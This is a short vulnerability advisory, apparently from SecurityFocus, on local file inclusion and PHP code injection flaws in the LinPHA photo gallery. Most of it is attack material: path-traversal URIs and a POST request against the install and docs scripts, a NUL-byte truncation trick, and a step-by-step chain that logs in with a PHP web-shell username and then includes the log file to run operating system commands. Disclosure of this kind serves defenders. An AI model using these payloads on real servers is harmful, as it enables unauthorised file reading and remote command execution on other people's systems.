
LinPHA Multiple Local File Inclusion and PHP Code Injection Vulnerabilities


The following URI examples were provided for the file inclusion issues:

http://www.example.com/[path]/docs/index.php?lang=/../../../../../../../../../../test
http://www.example.com/[path]/install/install.php?language=/../../../../../../../test
http://www.example.com/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../test
http://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../test


The following HTTP POST example was provided for the file inclusion issues:

POST [path]/install/forth_stage_install.php HTTP/1.1
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: GameBoy, Powered by Nintendo
Connection: Close

language=/../../../../../../../../test


The file inclusion issues may allow arbitrary system files to be retrieved if the 'magic_quotes_gpc' PHP directive is set to off: with it off, a NUL byte (%00) in the parameter reaches the include call unescaped and truncates the path at that point, so whatever the application appends after the user-supplied value is discarded; with it on, addslashes() rewrites the byte as the two characters '\0' and the truncation fails.

The following steps were provided to exploit the PHP code injection issues:

1. Log in with username: <?php system($_GET[cmd]);?>
and password: [whatever]

The username is recorded in the application's log file, sql/tmp/linpha.log. If 'magic_quotes_gpc' is set to off, that log file can then be pulled in through the 'lang' parameter (the trailing %00 truncates the path) and the injected PHP is executed, so operating system commands can be launched through the following request:

http://www.example.com/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00


Copyright 2009, SecurityFocus